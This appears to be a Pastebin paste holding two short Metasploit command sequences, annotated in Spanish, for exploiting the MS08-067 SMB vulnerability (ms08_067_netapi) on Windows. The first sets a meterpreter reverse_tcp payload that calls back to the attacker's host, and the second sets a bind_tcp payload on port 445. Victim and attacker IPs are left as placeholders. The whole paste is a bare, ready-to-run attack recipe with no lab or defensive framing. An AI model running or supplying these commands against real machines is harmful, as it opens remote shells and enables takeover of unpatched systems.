Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- msfconsole
- use exploit/windows/smb/ms08_067_netapi
- show options
- set RHOST (IP Victima)
- show targets
- set target 1
- set payload windows/meterpreter/reverse_tcp
- set LHOST (IP se ejecuta exploit)
- show options
- exploit
- msfconsole
- search netapi
- use exploit/windows/smb/ms08_067_netapi
- set LHOST (IP se ejecuta exploit)
- set RHOST (IP Victima)
- set RPORT 445
- set SMBPIPE BROWSER
- set payload windows/meterpreter/bind_tcp
- exploit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement